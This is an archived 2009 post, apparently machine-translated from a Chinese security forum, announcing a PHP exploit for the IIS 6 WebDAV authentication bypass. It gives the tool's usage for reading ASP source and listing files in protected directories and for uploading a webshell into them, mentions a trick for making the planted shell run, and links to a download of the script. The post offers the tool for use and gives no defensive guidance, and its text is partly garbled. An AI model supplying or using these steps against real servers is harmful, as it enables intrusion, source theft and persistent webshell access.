Open IIS6 Webdav Exploit PHPSHELL version-bug warning-the black bar safety net

2009-05-25T00:00:00
ID MYHACK58:62200923363
Type myhack58
Reporter 佚名
Modified 2009-05-25T00:00:00

Description

|

By racle@tian6.com && securiteweb.org Source:www.tian6.com && www.securiteweb.org

IIS6. 0 the WEBDAV vulnerability video and related presentations forum.for several days. milw0rm. com yesterday also discloses A C version to use the program. His effect I don't know,haven't used. Now tian6. com domestic first publication of a scripting EXP.

In fact, the day before yesterday just wanted to Write A without having to compile the EXP. Unfortunately the hand is not on the environment,to build but also too much trouble,so yesterday looking for a friend,together to finish this EXP. Already announced

Instructions:(specific use or test method,please refer to the day the male made the video.)

  1. * IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org *
    1. Usage: php '.$ argv[0].' source/path/put host path
  2. Example: php '.$ argv[0].' source www.tian6.com /blog/readme. asp
  3. Example2: php '.$ argv[0].' path www.tian6.com /secret/
  4. Example3: php '.$ argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)

_ Copy the code _

example: php.exe i.php source www.tian6.com /blog/readme. asp //查看 tian6.com,protected directory blog in the readme. asp source code

php.exe i.php path www.tian6.com /secret/ //查看 tian6.com,protected directory secret in all directories.

php.exe i.php put www.tian6.com /secret/ test.txt //the test. txt and i. php put together,inside is your WEBSHELL. Here the meaning is in thewww.tian6.comto a protected directory secret,from the local file test. txt read the content,then write to the secret directory. The default is racle. asp. But here there is a problem,the secret directory is protected,write into it, like can't run. Here is a very simple trick,we look carefully at the video.

! [](http://img37.imageshack.us/img37/2741/74571035.jpg)

! [](http://img29.imageshack.us/img29/6510/passsource.jpg)

! [](http://img36.imageshack.us/img36/6304/passpath.jpg)

! [](http://img132.imageshack.us/img132/1606/passput.jpg)

PHPSHELL download address:http://l14of. ys168. com/note/fd. htm? http://ys-B. ys168. com/? i. rar_4s7bsn0d6e0bs7bsn0cl1btomq0cpn2bit7b5btomojkiu14z97f14z